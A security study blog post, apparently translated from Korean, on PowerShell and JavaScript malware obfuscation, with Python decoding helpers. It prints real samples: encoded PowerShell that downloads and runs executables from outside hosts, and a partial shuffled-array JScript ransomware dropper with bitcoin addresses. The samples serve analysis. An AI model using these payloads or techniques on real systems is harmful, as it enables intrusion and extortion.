
Information Security Study - Week 21, Day 1 - Malware Obfuscation

wonder12 2023. 3. 4. 10:16

Today's post goes over this material again as a review.

☞ PowerShell obfuscation

Scripts are altered to hinder analysis.

Base64 is used a lot, but since it can simply be decoded it is encoding, not encryption.

 

PowerShell (New-Object Net.WebClient).DownloadFile('https://.tistory.com/
attachment/cfile7.uf@99DC973E5D30314E278FD2.exe', 'c:/putty.exe');IEX('c:/putty.exe');

This is a download-and-execute one-liner: WebClient.DownloadFile fetches the binary to c:/putty.exe, and IEX then runs that path.

1) Invoke-Expression means "execute". Start-Process, or ShellExecute through the Shell.Application COM object, are also commonly used for the same step.

> Invoke-Expression can be shortened to its alias IEX,

System.Net.WebClient > the System. prefix can be dropped (PowerShell resolves Net.WebClient on its own),

so this is more simplification than obfuscation. It still defeats a naive string match on "Invoke-Expression" or "System.Net.WebClient", which is why a detection should key on the behaviour (a WebClient download followed by execution) rather than on the literal names.

2)

PowerShell (New-Object ('N'+'et.W'+'eb'+'Cl'+'ie'+'nt')).'DownloadFile'('ht'+'tps://'+'.c'+
'om/atta'+'chme'+'nt/c'+'file7.'+'uf@99DC97'+'3E5'+'D3'+'0314E'+'278F'+'D2.exe','c:/putty.exe');
IEX('c:/pu'+'tty.exe');

The text is stitched together from fragments with '+'. This is used a great deal in real samples.

Save it as a .bat file and check that it runs (in an isolated VM, since it downloads and executes a binary).

Deleting the '+' with find-and-replace makes it at least somewhat readable; the leftover quotes still have to be merged to recover the real string.
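The merging step, as an added Python example that is not code from the post: it collapses every '+' chain of single-quoted PowerShell literals into one literal, so the class name, the method name and the download URL read as they did before obfuscation. Its only input is the post's sample 2) with the line breaks removed; the '' handling follows PowerShell's rule that a doubled quote is the only escape inside a single-quoted string.

```python
import re

# A PowerShell single-quoted literal has no escapes except '' for a literal quote,
# so two adjacent literals separated by '+' can be merged purely as text.
_CONCAT = re.compile(r"'((?:[^']|'')*)'\s*\+\s*'((?:[^']|'')*)'")


def collapse_concat(ps: str) -> str:
    """Merge chains such as 'N'+'et.W'+'eb' into 'Net.Web'.

    One regex pass only merges pairs ('a'+'b'+'c' -> 'ab'+'c'), so loop
    until the text stops changing.
    """
    prev = None
    while prev != ps:
        prev = ps
        ps = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", ps)
    return ps


# The post's sample 2) with its line breaks removed (PowerShell allows a newline after '+').
SAMPLE = (
    "PowerShell (New-Object ('N'+'et.W'+'eb'+'Cl'+'ie'+'nt')).'DownloadFile'('ht'+'tps://'+'.c'+"
    "'om/atta'+'chme'+'nt/c'+'file7.'+'uf@99DC97'+'3E5'+'D3'+'0314E'+'278F'+'D2.exe','c:/putty.exe');"
    "IEX('c:/pu'+'tty.exe');"
)


def deobfuscate_sample() -> str:
    return collapse_concat(SAMPLE)


if __name__ == "__main__":
    print(deobfuscate_sample())
```

Nothing is executed: the output is text you can read, and `'c:/putty.exe'` with the `IEX(...)` around it is exactly the execution step to look for once the string is whole.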

 

 

3)

Encoding-based obfuscation. Base64 is the usual case: hybrid-analysis will show the decoded text, but a base64 decode site is what most people reach for. The sample below is not base64, though. Every character of the script is stored as its decimal code, the codes are separated by characters drawn from a fixed delimiter set, and the decoder splits on that set and casts each number back to [char]. The leading .( $Env:PubLIc[13]+$Env:PUbLic[5]+'x') rebuilds iex from characters of $Env:Public (C:\Users\Public: index 13 is 'i', index 5 is 'e') and invokes it on the result.

.( $Env:PubLIc[13]+$Env:PUbLic[5]+'x') (-JoIn ( '36h119h115U99S114{105U112U116i32:61{32{110c101c119i45S111%98h106m101m99%116m32!45i67S111:109c79c98h106U101S99U116:32c87:83U99%114c105c112%116i46i83i104c101{108%108:59:36!119!101c98m99h108%105%101%110%116m32c61c32h110h101U119%45S111%98!106:101i99{116i32h83%121:115m116h101%109:46!78i101i116U46U87%101S98h67i108{105c101S110h116:59%36{114m97{110U100h111:109h32!61c32i110h101%119:45:111i98%106!101h99m116S32{114%97!110S100U111{109:59{36i117{114S108h115!32:61S32!39S104c116%116c112i58:47m47c102{111S108{120c100{111S103{101%114U109c46U105i110%102c111S47{49%39{46%83i112!108%105U116c40h39S44h39!41!59i36:110i97S109c101h32U61h32%36S114m97!110%100m111U109h46c110%101c120{116m40i49h44U32h54S53U53m51h54m41c59m36U112h97{116{104U32U61%32S36i101i110h118{58%116S101%109%112U32U43!32%39h92S39!32%43i32h36{110!97{109i101S32c43:32i39c46:101S120i101%39h59:102c111U114h101{97%99:104%40m36{117!114h108m32!105i110!32m36c117m114U108%115U41!123c116i114S121U123:36:119i101m98%99S108h105:101:110!116U46!68:111:119h110U108m111:97{100!70i105S108:101U40h36:117!114S108:46U84c111U83m116%114c105{110c103i40U41i44U32!36i112U97m116!104i41!59{83!116%97i114c116%45h80S114m111{99:101U115{115{32h36:112U97:116S104c59U98c114{101!97m107%59!125h99h97m116m99:104!123S119%114i105i116:101m45i104S111%115i116h32c36U95!46S69i120!99{101m112U116{105c111%110:46h77i101U115%115{97:103U101%59!125S125'.sPLIt(':i{mShU!c%') | forEach { ( [iNT] $_ -As [cHAR])})) 

Opening the plaintext often reveals that it is encoded a second time.

In that case reduce it to

$a = ;
$b = ;
-Join ($a.sPLIt($b) | forEach { ( [iNT] $_ -As [cHAR])})

with the encoded string in $a and the delimiter set in $b, and run it in PowerShell ISE to get the plaintext.

The script, as it runs, writes out the original code for you. Keep only the decoding expression: the leading .( ... ) invocation, or any trailing IEX, has to be dropped, otherwise the decoded payload executes instead of being displayed. Do this in an isolated VM.

Paste the plaintext you get into Notepad++ and run JSFormat on it to make it readable.

It is structured as try / break / catch,

and Start-Process is the execution step.

3-2)

"$(sEt-ITem 'VARIAble:OFS'  '') "+ [sTrInG]( ( 36,119,115, 99 ,114 ,105 ,112 , 116 ,32 ,61 ,
32, 110 , 101 , 119, 45,111,98 , 106 , 101,99,116 ,32 ,45 , 67,111 , 109 , 79,98 ,106 ,101,99,
116, 32,87 , 83,99,114 ,105,112 , 116 ,46, 83, 104 ,101 , 108 ,108,59 , 36 ,119 ,101 ,98,99 ,
108,105 ,101, 110 ,116, 32,61, 32 , 110,101, 119 , 45 ,111 , 98, 106, 101 , 99,116 ,32 ,83 , 
121 ,115 , 116 , 101, 109 , 46, 78 ,101,116,46 , 87 , 101 , 98 ,67, 108 , 105,101, 110, 116 ,
59 , 36 ,114 ,97 , 110,100 ,111, 109, 32 ,61, 32,110 ,101 ,119 ,45, 111, 98,106 ,101,99, 116 ,
32, 114 , 97,110,100, 111 ,109, 59 ,36,117 , 114 ,108 ,115 ,32 , 61 , 32,39 ,104 ,116 ,116 ,
112 , 58, 47 , 47 , 108, 121 ,109 , 97,110 ,105 ,116 ,101 ,46 , 99 , 111, 109 ,47,82, 119 , 97 ,
89,103,97,109,68 , 47,44,104 ,116 ,116 , 112 ,58 , 47, 47,104 ,97 , 108 ,97 , 114 ,105 ,115,46 ,
99 ,111, 109 ,47,71 , 72 ,101,47 , 44,104 ,116, 116, 112 ,58 ,47 , 47 , 108, 111 , 118,101 ,110 , 100 ,117 , 115 ,107, 105 , 46 ,99, 111 ,109,47 , 119,69,115, 106,104,78 ,100 , 47,44 , 104 , 116, 116,112 ,58,47,47 ,97,112, 101, 114 ,102,101 , 99 ,116,105 , 109, 97 , 103 , 101 , 46,112 ,108, 47, 47 ,72 , 87 ,109 , 119 ,47, 44, 104, 116 , 116,112 , 58, 47, 47 , 108 ,117, 120, 109, 101 ,100 , 105 , 97 , 46, 99 ,111, 109,46 , 112, 108, 47 ,112 , 111 ,114 ,116,102, 111, 108, 105 ,111,47, 111 , 103,90, 47 , 39, 46, 83,112,108,105,116,40, 39,44, 39, 41, 59, 36, 110, 97, 109 , 101 ,32 ,61,32, 36, 114,97 ,110 , 100 , 111,109,46, 110,101 ,120 , 116 ,40 , 49,44, 32 ,54, 53 ,53 , 51 ,54, 41,59, 36,112,97 ,116, 104 , 32, 61 ,32 , 36,101, 110, 118 , 58,116,101 , 109 ,112 ,32,43 ,32, 39 ,92 , 39,32, 43 ,32 , 36 , 110 ,97, 109 ,101,32 ,43 ,32,39 ,46 , 101,120 , 101,39, 59 , 102,111,114,101, 97,99 ,104,40,36, 117 ,114, 108, 32, 105,110,32, 36 ,117, 114 , 108 , 115 , 41 , 123,116, 114, 121,123 , 36 ,119 , 101 ,98,99 ,108, 105 , 101 , 110 , 116 ,46, 68, 111, 119 ,110,108 ,111,97 ,100,70,105 , 108 ,101 , 40 ,36, 117, 114 , 108 , 46, 84 ,111 , 83 , 116, 114, 105,110, 103,40, 41,44,32 ,36 ,112 , 97 , 116,104 , 41,59 ,83,116,97,114,116,45 , 80 , 114 , 111 , 99 , 101, 115 ,115 ,32 ,36 , 112,97, 116,104,59 ,98 , 114,101, 97, 107 , 59, 125, 99,97 , 116 , 99, 104, 123 , 119, 114 , 105 ,116 , 101,45 , 104 , 111 ,115, 116, 32 , 36 ,95,46 , 69 ,120, 99 , 101,112 ,116,105 ,111 ,110,46, 77, 101 , 115 , 115 , 97 ,103,101, 59, 125, 125) | foREAcH { ([Int] $_-As[char])})+" $(set-Item  'VaRIABLe:OFs' ' ' )"

#|& ( $ENV:CoMSpec[4,26,25]-JoIN'')

This one is also run in ISE to obtain the plaintext. The $(Set-Item 'Variable:OFS' '') at the front clears $OFS, the separator PowerShell inserts when it stringifies an array, so the [char] array joins without spaces; the trailing $(Set-Item 'Variable:OFS' ' ') restores the default. The commented-out tail |& ( $ENV:CoMSpec[4,26,25]-JoIN'') is the execution sink.

COMSPEC is C:\Windows\system32\cmd.exe.

Using Python IDLE you can confirm that positions 4, 26 and 25 of that string are 'i', 'e' and 'x'.

So & (...) invokes IEX, i.e. executes the decoded text. The # in front of it is what keeps the sample from running its payload when the rest is evaluated in ISE.
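Decoding the character-code layer without running anything, as an added Python example that is not part of the post. It handles both the delimiter-split form of 3) and the comma list of 3-2), and models the $Env:Public[13]+$Env:Public[5]+'x' and $ENV:CoMSpec[4,26,25] index tricks. The inputs are the opening codes of the post's own two samples; the two environment values are the defaults of a stock Windows install and are assumed here, not read from a machine.

```python
import re


def decode_charcodes(blob, delims=None):
    """Rebuild text from decimal character codes.

    delims=None : every run of digits is a code, whatever sits between them
                  (the comma list of 3-2).
    delims=str  : split on exactly that character set, as .Split(':i{mShU!c%')
                  does in 3), where each character of the set is a separator.
    """
    if delims is None:
        tokens = re.findall(r"\d+", blob)
    else:
        tokens = re.split("[" + re.escape(delims) + "]+", blob)
    return "".join(chr(int(t)) for t in tokens if t.strip())


def index_pick(value, indices):
    """Model $Env:X[i,j,k] -join '' (and $Env:X[i]+$Env:X[j]): characters by position."""
    return "".join(value[i] for i in indices)


# Opening codes of the post's sample 3) (up to the first ';' of the decoded script)
SPLIT_SAMPLE = ("36h119h115U99S114{105U112U116i32:61{32{110c101c119i45S111%98h106m101m99"
                "%116m32!45i67S111:109c79c98h106U101S99U116:32c87:83U99%114c105c112%116"
                "i46i83i104c101{108%108:59")
SPLIT_DELIMS = ":i{mShU!c%"   # the argument of .sPLIt() in the sample

# Opening entries of the post's sample 3-2), the same script as an integer list
LIST_SAMPLE = ("36,119,115, 99 ,114 ,105 ,112 , 116 ,32 ,61 , 32, 110 , 101 , 119, 45,111,98 , "
               "106 , 101,99,116 ,32 ,45 , 67,111 , 109 , 79,98 ,106 ,101,99, 116, 32,87 , "
               "83,99,114 ,105,112 , 116 ,46, 83, 104 ,101 , 108 ,108,59")

# Assumed: default values on a stock Windows install, not read from a machine
ENV_PUBLIC = r"C:\Users\Public"
ENV_COMSPEC = r"C:\Windows\system32\cmd.exe"


def decode_layer_3():
    return decode_charcodes(SPLIT_SAMPLE, SPLIT_DELIMS)


def decode_layer_3_2():
    return decode_charcodes(LIST_SAMPLE)


def resolve_invokers():
    # .( $Env:PubLIc[13]+$Env:PUbLic[5]+'x' )   and   & ( $ENV:CoMSpec[4,26,25] -join '' )
    return index_pick(ENV_PUBLIC, [13, 5]) + "x", index_pick(ENV_COMSPEC, [4, 26, 25])


if __name__ == "__main__":
    print(decode_layer_3())
    print(resolve_invokers())
```

Both samples decode to the same first statement, which is the point of the two variants: the encoding changes, the script underneath does not. Resolving the index expressions on paper tells you the sink is iex before you have touched ISE at all.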

 

 

☞ JavaScript obfuscation

1) Collapse everything onto one line.

At this size it is still readable, but once the script grows it becomes hard to follow.

2) Wrap it in a function so it passes for ordinary function code.

<script>var n = function() {var n = 777; var a = 'casino'; alert(a); alert(n);}; n();</script>

(The ';' between the closing brace and n() is required; on a single line without it the snippet is a syntax error.)

3) Store the code in string variables with var and join them afterwards.


var s1 = "\<script\>";
var s2 = "var n =";
var s3 = "777;";
var s4 = "var a ";
var s5 = "= 'cas";
var s6 = "ino';";
var s7 = "ale";
var s8 = "rt(a);";
var s9 = "al";
var s10 = "ert(n);";
var s11 = "\</script\>";
document.write(s1 + s2 + s3 + s4 + s5 + s6 + s7 + s8 + s9 + s10 + s11);

This is after reformatting with JSFormat. The \< and \> escapes do not change the string values; they only keep a literal </script> out of the page source so the HTML parser does not close the outer script block early.


4) Insert junk and strip it at the end.

Into code with the token trashjavascript inserted repeatedly at random positions,

document.write(s.replace(/trashjavascript/g, ""))

removes every occurrence before writing.

This too can be undone with find-and-replace.


5) Encode as percent-escaped hex ASCII codes.


<script> var s0 = "%3C%73%63%63%69%73%63%6F%73%79%73%74%65%6D%73%72%69%70%74%3E";var s1 = "%76%61%72 %63 %3d%63%69%73%63%6F%73%79%73%74%65%6D%73";var s2 = " %66%75%6e%63%69%73%63%6F%73%79%73%74%65%6D%73%63%74%69%6f%6e%28%29";var s3 = " %7b%76%61%72 %6e %3d%63%69%73%63%6F%73%79%73%74%65%6D%73";var s4 = "%63%69%73%63%6F%73%79%73%74%65%6D%73 %37%37%37%3b%76%61%63%69%73%63%6F%73%79%73%74%65%6D%73%72 %61 ";var s5 = "%63%69%73%63%6F%73%79%73%74%65%6D%73%3d %27%63%61%73";var s6 = "%69%6E%6F%27%3b%63%69%73%63%6F%73%79%73%74%65%6D%73%61%6c%65%72";var s7 = "%74%28%63%69%73%63%6F%73%79%73%74%65%6D%73%61%29%3b%61";var s8 = "%63%69%73%63%6F%73%79%73%74%65%6D%73%6c%65";var s9 = "%72%74%63%69%73%63%6F%73%79%73%74%65%6D%73%28%6e";var s10 = "%29%3b%63%69%73%63%6F%73%79%73%74%65%6D%73";var s11 = "%63%69%73%63%6F%73%79%73%74%65%6D%73%7d%3b ";
var s12 = "%63%28%29%63%69%73%63%6F%73%79%73%74%65%6D%73";var s13 = "%3C%2F%73%63%63%69%73%63%6F%73%79%73%74%65%6D%73%72%69%70%74%3E";var s14 =s0+s1+s2+s3+s4+s5+s6+s7+s8+s9+s10+s11+s12+s13;var s = unescape(s14.replace(/%63%69%73%63%6F%73%79%73%74%65%6D%73/g, ""));document.write(s); </script>

Remove the % with find-and-replace,

remove the spaces,

select the text and convert hex to ASCII,

and then put the spacing back.

The junk token %63%69%73%63%6F%73%79%73%74%65%6D%73 (it decodes to "ciscosystems") has to be stripped as well, which is what the script's own replace() does before unescape(); converting first and then deleting "ciscosystems" works too, as long as that word does not occur in the real code.
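Undoing 4) and 5) in one place, as an added Python example that is not the post's code: it strips a junk token from the still-encoded text and then decodes %XX and %uXXXX the way JavaScript's unescape() does. The input for 5) is the post's s0..s13 strings; the one-line trashjavascript input for 4) is constructed for the demo.

```python
import re

_PCT = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    """Mirror JavaScript's legacy unescape(): %XX and %uXXXX become that code point
    directly, with no UTF-8 step (urllib.parse.unquote would differ above 0x7F)."""
    return _PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def strip_junk_and_decode(text, junk):
    """Delete every occurrence of the junk token from the still-encoded text, then
    decode: the same order as the sample's unescape(s14.replace(/junk/g, ""))."""
    return js_unescape(text.replace(junk, ""))


# The post's s0..s13 from 5). The junk token decodes to "ciscosystems".
JUNK = "%63%69%73%63%6F%73%79%73%74%65%6D%73"
PARTS = [
    "%3C%73%63%63%69%73%63%6F%73%79%73%74%65%6D%73%72%69%70%74%3E",
    "%76%61%72 %63 %3d%63%69%73%63%6F%73%79%73%74%65%6D%73",
    " %66%75%6e%63%69%73%63%6F%73%79%73%74%65%6D%73%63%74%69%6f%6e%28%29",
    " %7b%76%61%72 %6e %3d%63%69%73%63%6F%73%79%73%74%65%6D%73",
    "%63%69%73%63%6F%73%79%73%74%65%6D%73 %37%37%37%3b%76%61%63%69%73%63%6F%73%79%73%74%65%6D%73%72 %61 ",
    "%63%69%73%63%6F%73%79%73%74%65%6D%73%3d %27%63%61%73",
    "%69%6E%6F%27%3b%63%69%73%63%6F%73%79%73%74%65%6D%73%61%6c%65%72",
    "%74%28%63%69%73%63%6F%73%79%73%74%65%6D%73%61%29%3b%61",
    "%63%69%73%63%6F%73%79%73%74%65%6D%73%6c%65",
    "%72%74%63%69%73%63%6F%73%79%73%74%65%6D%73%28%6e",
    "%29%3b%63%69%73%63%6F%73%79%73%74%65%6D%73",
    "%63%69%73%63%6F%73%79%73%74%65%6D%73%7d%3b ",
    "%63%28%29%63%69%73%63%6F%73%79%73%74%65%6D%73",
    "%3C%2F%73%63%63%69%73%63%6F%73%79%73%74%65%6D%73%72%69%70%74%3E",
]


def decode_section_5():
    return strip_junk_and_decode("".join(PARTS), JUNK)


# Constructed one-liner for 4): plain code with the junk word sprinkled in, no hex.
TRASHED = "aletrashjavascriptrt(trashjavascript'catrashjavascriptsino')trashjavascript;"


def decode_section_4():
    return strip_junk_and_decode(TRASHED, "trashjavascript")


if __name__ == "__main__":
    print(decode_section_5())
    print(decode_section_4())
```

Replacing the junk before decoding matters only because the junk is itself percent-encoded; the function takes the token verbatim in whatever form the script's own replace() uses, so the same call handles the plain-text case of 4).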

 

 

6) Array pieces in shuffled order > executed in index order

function k77(l31,d19) {t42[l31] = d19;}; var t42 = new Array();k77(690, '" ');k77(161, 'i++) ');
k77(767, 't REG_');k77(501, 'n ad');k77(357, 'encr');k77(409, '"); ');k77(458, 'with c');
k77(627, 'e("  ');k77(861, 'le%');k77(226, ';try');k77(949, 'EC% /c');k77(78, 'ndEn');k77(641, 'ne');k77(598, 'LE');k77(250, '} e');k77(445, '"")');k77(376, 'fp');k77(577, 'eLin');k77(926, 'c DE');k77(335, 'nts, p');k77(210, 'xa.');k77(459, 'ash');k77(944, '; ');k77(75, '"); va');k77(88, ' var p');k77(203, '(x');k77(255, '{xa');k77(947, '%COM');k77(39, 'nieli');k77(15, 'g.fro');k77(36, 'atedi');k77(422, '); fp');k77(165, 'ry {');k77(63, '; v');k77(807, 'otepa');k77(882, '"+c');k77(220, 'ToF');k77(513, '  ');k77(488, '.Wri');k77(550, 'for (v');k77(392, 'BTC (b');k77(362, 'stro');k77(379, 'To re');k77(430, '   ');k77(265, 'File(');k77(402, 's m');k77(45, 'thmum');k77(77, 's.Expa');k77(21, 'trin');k77(337, 'tos');k77(838, 'to');k77(159, '<ll.l');k77(17, 'arCod');k77(30, 'bapa');k77(102, 'ts.dl');k77(705, 'T.');k77(589, 'es.');k77(10, ' l');k77(460, ', us');k77(400, 'ollow ');k77(802, '_S');k77(348, 'ers');k77(721, 'U"+cs+');k77(370, ' w');k77(614, 'do n');k77(377, '.Write');k77(235, '};}');k77(941, '+".e');k77(272, 'a.c');k77(572, 'te');k77(662, '."');k77(700, 'on you');k77(546, 'teL');k77(198, 'n(); ');k77(834, 'ata%"+');k77(344, ' i');k77(899, 'fp=f');k77(391, '+" ');k77(73, 'pt');k77(364, ' R');k77(92, 'iron');k77(940, '+fn');k77(477, 'calbi');k77(438, 'wall');k77(227, '{ws.R');k77(433, 'bloc');k77(560, '    ');k77(618, 's YOU');k77(303, 's(fn');k77(631, 'od');k77(281, 'break');k77(316, '",tr');k77(713, 'n("%CO');k77(340, 'se');k77(398, 'Ple');k77(170, ':/');k77(904, '.p');k77(472, '("');k77(41, 'ta.es');k77(353, 'rit');k77(805, '"+cq+');k77(107, '.Cre');k77(462, 'g sea');k77(901, 'reateT');k77(186, '); xo.');k77(172, 'i]');k77(179, '&i');k77(305, '.php"');k77(532, 'in');k77(548, '")');k77(2, 'var ad');k77(480, 'buy_bi');k77(259, ',2);} ');k77(628, '   ');k77(217, '=2){x');k77(709, 'ose(');k77(951, 'EL');k77(49, 'tgangt');k77(492, 'd ');k77(151, 'ar n=1');k77(836, '+"De');k77(586, 're');k77(906, '",t');k77(880, 'n+".p');k77(68, 'ateObj');k77(290, 'is');k77(688, 
'Write');k77(850, 'py');k77(118, 'r x');k77(648, 'in');k77(455, '+"');k77(832, '"+cq+"');k77(854, '".');k77(297, 'xists(');k77(137, 'ystem');k77(710, ');');k77(902, 'extFil');k77(352, ' fp.W');k77(542, 'crypt');k77(209, ' if(');k77(112, 'sxml2.');k77(790, '"s');k77(852, 'y "+c');k77(736, 'n"+cq');k77(725, 's+"Mi');k77(704, 'CRYP');k77(3, '="12DgfDY8pU2cpMwgHbtaWB9dgd8fuhJRk6');k77(131, 'Obj');k77(606, 'fp');k77(134, 'pti');k77(150, 'or(v');k77(527, ' one ');k77(935, '("%COM');k77(829, '".tx');k77(945, 'ws.');k77(633, 'an he');k77(888, 'PEC');k77(465, '; fp.');k77(436, '.i');k77(946, 'Run("');k77(929, 'fn');k77(796, 'mm');k77(218, 'a.');k77(907, 'rue);');k77(503, ':");');k77(601, 'EMBER');k77(274, 'e(');k77(285, ' }; };');k77(876, '% /c "');k77(784, 'HKCR"+');k77(315, 'xt');k77(567, 'ter/?a');k77(446, '; fp.W');k77(478, 'tcoin');k77(623, 'ILES.');k77(828, 'cq+fn+');k77(715, 'EC% /');k77(393, 'itcoin');k77(777, '("');k77(11, 'd=0;');k77(277, '(d');k77(270, '} ');k77(214, '=1;');k77(65, 'ws=WSc');k77(547, 'ine("');k77(616, ' in');k77(355, 'e("wer');k77(541, ' de');k77(485, 'teLine');k77(127, 'var ');k77(769, 'F /D');k77(484, 'Wri');k77(849, ' /c co');k77(453, '"+');k77(666, 'Line');k77(126, 'm"); ');k77(110, 'ect');k77(753, '; ws.R');k77(747, ' "+');k77(800, '/t');k77(922, ' ws.Ru');k77(538, ' d');k77(146, 'n+".t');k77(341, 's ');k77(622, 'R F');k77(283, 'catch(');k77(320, 'ine("');k77(167, 'en');k77(686, '; ');k77(786, 'Crypt');k77(599, 'ASE R');k77(366, '10');k77(868, 'PT.tx');k77(13, 'q=');k77(855, 'txt"');k77(495, ' BT');k77(727, 'ft"+c');k77(103, 'l"; v');k77(651, 'dow');k77(766, 'e /');k77(869, 't"+');k77(917, 'Line');k77(242, 'a.s');k77(934, 'ws.Run');k77(241, '{x');k77(698, 'ma');k77(19, '); va');k77(450, 'e(');k77(293, 'exe');k77(886, 'un("');k77(108, 'at');k77(47, 'm","');k77(212, '000');k77(564, '+ll[i]');k77(124, '"ADODB');k77(213, ') { dn');k77(426, '""); f');k77(520, 'ne(""');k77(271, '}; x');k77(295, 'fo.Fi');k77(56, 'sea');k77(249, '2);');k77(689, 
'Line(');k77(910, ' i=0;i');k77(696, ' find');k77(180, 'd="+id');k77(71, 'Sc');k77(900, 'o.C');k77(952, ' "+c');k77(418, 'al');k77(365, 'SA-');k77(639, 'Wr');k77(742, '+cq+"');k77(367, '24 al');k77(188, 'nd(); ');k77(114, 'HTT');k77(716, 'c R');k77(448, 'eL');k77(723, 'TWA');k77(514, '   "+');k77(663, '); ');k77(37, '.or');k77(857, '" "');k77(1, '="c5F5zaa6WhR1OawB0878ZiyWm9diFSpyx8RUzx3TjXQrsqruq5wjIHXY1NDT4aqPSgi2bd9QoGSOsl6R-9gAKtyHNheGrhiPnIOeoXRtNQ"; ');k77(516, '; fp');k77(224, 'xe",');k77(358, 'yp');k77(909, 'ar');k77(536, 'rows');k77(517, '.Wr');k77(812, 'q+fn+"');k77(407, 'teLine');k77(806, '"n');k77(408, '("');k77(321, 'ATTENT');k77(231, 'xe",1,');k77(325, 'ine("');k77(525, '"4');k77(772, 'ypted"');k77(254, '==4)');k77(280, '=i;');k77(602, ':"); f');k77(821, 'un("%');k77(342, 'and ot');k77(334, 'cume');k77(169, ',"http');k77(157, '(var i');k77(215, ' if(');k77(761, 'KCR"');k77(470, 'p.Writ');k77(327, ' fp.Wr');k77(5, 'r ');k77(776, '.Run');k77(706, 'txt).');k77(25, 'ode(');k77(859, 'UserPr');k77(427, 'p.Writ');k77(208, ');');k77(351, 'les");');k77(795, 's+"co');k77(809, 'xe');k77(468, '("")');k77(773, '+cq,0,');k77(115, 'P"');k77(693, 'Yo');k77(494, 'bc+"');k77(199, 'xa.ty');k77(168, '("GET"');k77(702, 'ktop');k77(269, '2);');k77(751, '"+cq,0');k77(496, 'C ');k77(607, '.Wri');k77(530, 'ollo');k77(764, 'd"+cq');k77(34, 'anic');k77(647, 'to re');k77(695, 'an');k77(529, ' f');k77(735, 's+"Ru');k77(262, '==5){x');k77(699, 'nual ');k77(301, '.Fil');k77(27, 'ar l');k77(508, 'fp');k77(779, 'SPEC% ');k77(323, '); fp.');k77(264, 'aveTo');k77(669, ' - Y');k77(310, 'eTex');k77(268, '.php",');k77(825, 'y /');k77(511, 'teLin');k77(81, 'tStri');k77(604, 'eLine(');k77(403, 'anua');k77(432, 'ps://');k77(263, 'a.s');k77(91, 'ndEnv');k77(840, 'cs+"D');k77(139, 'ct"); ');k77(80, 'en');k77(683, 'e paym');k77(120, 'ipt.Cr');k77(493, '"+');k77(328, 'iteLi');k77(914, '{f');k77(454, 'bc');k77(401, 'thi');k77(743, ' /t RE');k77(58, 'cons');k77(580, ' d');k77(867, 
'DECRY');k77(871, '0);');k77(33, 'bjibap');k77(225, '2)');k77(792, 'l"+c');k77(497, 'to ');k77(356, 'e ');k77(26, '92); v');k77(891, '.ex');k77(885, 's.R');k77(667, '(" ');k77(680, 'r you');k77(878, '".exe ');k77(347, ' p');k77(439, 'et/n');k77(48, 'nieli');k77(136, 'FileS');k77(481, 'tcoin');k77(592, 'iteL');k77(605, '""); ');k77(932, '+cq,');k77(817, 'q,');k77(574, 'e("');k77(537, 'er to');k77(368, 'gor');k77(190, 'o.');k77(466, 'WriteL');k77(90, '.Expa');k77(50, 'ok.e');k77(953, 'q+pd+');k77(624, '"); f');k77(718, 'D "+c');k77(801, ' REG');k77(539, 'ow');k77(247, '.exe');k77(239, '==');k77(575, '"); fp');k77(166, ' xo.op');k77(890, 'otepad');k77(535, 'our b');k77(609, 'ne');k77(371, 'ith a ');k77(865, 'op"+cs');k77(588, 'ur fil');k77(230, '.e');k77(101, 'hp4');k77(104, 'ar x');k77(123, 'ject(');k77(147, 'xt');k77(611, '    -');k77(554, 'ngth');k77(187, 'se');k77(18, 'e(34');k77(232, '0)');k77(655, 'antiv');k77(302, 'eExist');k77(152, ';n<');k77(238, '(n');k77(571, 'p.Wri');k77(841, 'ECRYPT');k77(954, 'cq,0,');k77(244, 'To');k77(798, 'cq+" /');k77(421, 'here:"');k77(557, 'fp.');k77(467, 'ine');k77(643, '     ');k77(476, '://lo');k77(842, '.txt"');k77(762, '+cs+".');k77(372, 'unique');k77(67, 't.Cre');k77(153, '=5;n');k77(847, '("%COM');k77(374, 'y.');k77(116, '); ');k77(905, 'hp');k77(178, '+"');k77(140, 'if (!');k77(390, '"+bc');k77(345, 'mpor');k77(177, 'd="+ad');k77(728, 's+"Win');k77(133, '("Scri');k77(632, 'y c');k77(183, '+i');k77(551, 'ar i=0');k77(105, 'o=W');k77(585, 'sto');k77(780, '/c REG');k77(343, 'her');k77(229, 'fn+n+"');k77(748, 'cq+');k77(566, 'un');k77(924, 'MSPEC');k77(830, 't"');k77(38, 'g","');k77(89, 'd=ws');k77(746, '/D');k77(437, 'nfo/');k77(726, 'croso');k77(803, 'Z ');k77(128, 'fo=WS');k77(40, 'tkolka');k77(380, 'st');k77(782, 'DD "+c');k77(434, 'kc');k77(918, '(ad)');k77(284, 'er){};');k77(424, 'rit');k77(745, 'SZ /F ');k77(856, '+cq+');k77(96, 's("');k77(20, 'r cs=S');k77(521, '); fp');k77(449, 'in');k77(775, '; ws');k77(62, 
'm"]');k77(732, 'Versi');k77(499, 's Bi');k77(749, 'fn+".t');k77(502, 'dress');k77(338, ', data');k77(195, ') { x');k77(646, 'eless ');k77(545, 'Wri');k77(679, ' afte');k77(55, 'sonre');k77(804, '/F /D ');k77(562, 'ht');k77(955, '0)');k77(658, 'softw');k77(928, '+cq+');k77(399, 'ase f');k77(590, '");');k77(414, 'ea');k77(412, 'e("1');k77(670, 'our f');k77(665, '.Write');k77(778, '%COM');k77(595, 'p.Wr');k77(788, '"+');k77(162, '{ var');k77(122, 'teOb');k77(222, '+n+');k77(707, '"); f');k77(515, 'ad)');k77(741, 'ted"');k77(712, 'Ru');k77(730, 'cs+"Cu');k77(824, 'c cop');k77(66, 'rip');k77(714, 'MSP');k77(53, 'n","pe');k77(275, '); }; ');k77(837, 'sk');k77(143, 'le');k77(428, 'eLine(');k77(219, 'save');k77(273, 'los');k77(664, 'fp');k77(444, 'ne(');k77(839, 'p"+');k77(246, '(fn+"');k77(799, 've ');k77(60, 'ng.');k77(158, '=ld;i');k77(373, ' ke');k77(911, '<1000');k77(569, '+ad); ');k77(417, 'oin w');k77(893, 'cq+fn+');k77(610, '("  ');k77(154, '++');k77(396, 'riteLi');k77(894, '".t');k77(234, 'h(er){');k77(898, 'ar ');k77(369, 'ithm');k77(581, 'ecry');k77(763, 'crypte');k77(260, 'els');k77(781, ' A');k77(336, 'ho');k77(442, '; fp.W');k77(701, 'r des');k77(276, 'if');k77(404, 'l:"');k77(76, 'r fn=w');k77(306, ')) { v');k77(685, '.")');k77(121, 'ea');k77(482, 's"); f');k77(289, 